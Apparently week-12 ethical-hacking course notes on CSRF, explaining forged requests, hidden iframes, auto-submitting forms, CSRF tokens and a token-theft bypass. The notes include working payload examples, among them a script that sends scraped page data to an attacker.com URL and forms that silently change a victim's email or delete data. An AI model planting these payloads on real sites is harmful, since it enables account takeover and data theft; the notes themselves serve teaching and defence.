Segfault ethical hacking week 12

Understanding CSRF (Cross-Site Request Forgery): A Deep Dive

CSRF (Cross-Site Request Forgery) is one of the most common and dangerous web vulnerabilities. It exploits the trust that a web application has in a user’s browser session to perform unauthorized actions on behalf of the user.

Server-side attack:

• SQL Injection: Manipulating server queries by injecting malicious SQL statements.

Client-side attacks:

• XSS (Cross-Site Scripting): Injecting malicious scripts into web pages viewed by other users.

• CSRF (Cross-Site Request Forgery): Forcing a victim’s browser to send unintended requests to a trusted site.

Script that retrieves data from another page

Example:

<iframe id="myFrame" src="mypage.php"></iframe>
<script>
  var myFrame = document.getElementById('myFrame');
  var data = myFrame.contentDocument.getElementById('targetElement').innerText;
  var i = new Image();
  i.src = "https://attacker.com/?" + data;
</script>

• This script loads a page into an iframe and extracts specific data.

• The stolen data is sent to the attacker via a GET request.

CSRF (Cross-Site Request Forgery)

• An attack that tricks the victim into making unwanted requests to the server.

• Example: When the victim is authenticated, the attacker forces a request that changes account settings.

Difference:

• CSRF: Victim’s browser is exploited to send requests.

• XSS: Malicious scripts are injected to run in the victim’s browser.

Combining CSRF and XSS

• XSS can be used to automatically trigger CSRF, without requiring the victim to click.

• Where does CSRF happen?

  • Any request can be exploited.

  • GET requests are particularly dangerous because clicking a link is enough.

  • Using POST instead of GET does not solve CSRF if no validation is implemented.

Example:

<h1>Click This!!!</h1>
<form method="POST" action="https://victim.com/update">
  <input type="hidden" name="email" value="attacker@example.com" />
  <input type="submit" value="Submit" />
</form>

• When the victim clicks, a forged request updates data.

Iframe-based attacks

Hidden iframe:

<iframe width="0" height="0" border="0" name="stealthFrame"></iframe>

Using JavaScript to auto-submit a form:

<script>
  document.getElementById("myForm").submit();
</script>

• The victim unknowingly sends the request.

Automated XSS scenario

Example:

<h1>Hello</h1>
<form method="POST" action="https://victim.com/change" id="myForm">
  <input type="hidden" name="email" value="attacker@evil.com" />
</form>
<script>
  document.getElementById("myForm").submit();
</script>

• Visiting the page triggers the request automatically.

Combining iframe + form submission

Example:

<iframe name="stealthFrame"></iframe>
<form method="POST" action="https://victim.com/delete" id="myForm" target="stealthFrame">
  <input type="hidden" name="confirm" value="yes" />
</form>
<script>
  document.getElementById("myForm").submit();
</script>

• The request is sent invisibly in the background.

CSRF Token

• A unique token generated by the server for each user session.

• Must be included in forms:

<form>
  <input type="hidden" name="csrfToken" value="unique_token_value" />
</form>

• The server verifies that the submitted token matches.

• If the token is missing or invalid, the request is rejected.

CSRF token characteristics:

• Unknown to the attacker.

• Changes with every request.

• Prevents attacks even when using iframes.

Bypassing CSRF using iframe and JavaScript

• Attackers may try to load a victim’s page in an iframe:

<iframe src="mypage"></iframe>

• Use JavaScript to read the CSRF token:

var token = iframe.contentDocument.getElementById("csrfToken").value;

• Then create a malicious form and submit it with the stolen token.

• This method can bypass CSRF protection if the site allows cross-origin access (which is why Same-Origin Policy must be enforced)..